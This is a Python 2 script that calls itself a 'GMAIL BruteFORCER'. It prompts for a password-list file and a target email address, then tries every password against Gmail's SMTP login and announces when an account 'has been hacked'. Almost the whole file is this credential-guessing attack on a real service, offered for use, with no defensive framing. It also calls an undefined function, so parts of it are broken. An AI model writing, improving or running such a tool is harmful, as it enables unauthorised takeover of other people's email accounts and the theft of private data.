#!/usr/bin/python


import smtplib
from os import system
import colorama
import termcolor
from colorama import init 
from colorama import Fore, Back, Style 
from termcolor import colored 
  
init() 

print (Fore.GREEN +"                 _                _     ")    
print ("                 | |              | |      ")  
print ("                 | |__  _ __ _   _| |_ ___   ")
print ("                 | '_ \| '__| | | | __/ _ \  ")
print ("                 | |_) | |  | |_| | ||  __/  ")
print ("                 |_.__/|_|   \__,_|\__\___|  ")
print ("                 __                        ")
print ("                / _|                       ")
print ("               | |_ ___  _ __ ___ ___ _ __ ")
print ("               |  _/ _ \| '__/ __/ _ \ '__|  ")
print ("               | || (_) | | | (_|  __/ |   ")
print ("               |_| \___/|_|  \___\___|_|   ")
print (" \n ")
print (Fore.YELLOW + "                 GMAIL BruteFORCER")
print (Fore.WHITE +  "                 Coded by: Ahmadbrainworks")
print ("                  Website: https://jaridarfasaha.com.ng")
print ("   Special Thanks to: Abushuraim and Arewa Wap/Web Masters")
                             
print ("\n ")       

print '[1] Start'
print '[2] exit'
option = input('==>')
if option == 1:
   file_path = raw_input('path of passwords file :')
else:
   system('clear')
   exit()
pass_file = open(file_path,'r')
pass_list = pass_file.readlines()
def login():
    i = 0
    user_name = raw_input('target email :')
    server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    server.ehlo()
    for password in pass_list:
      i = i + 1
      print str(i) + '/' + str(len(pass_list))
      try:
         server.login(user_name, password)
         system('clear')
         main()
         print '\n'
         print '[+] This Account Has Been Hacked Password :' + password + '     ^_^'
         break
      except smtplib.SMTPAuthenticationError as e:
         error = str(e)
         if error[14] == '<':
            system('clear')
            main()
            print '[+] this account has been hacked, password :' + password + '     ^_^'

            break
         else:
            print '[!] password not found => ' + password
login()
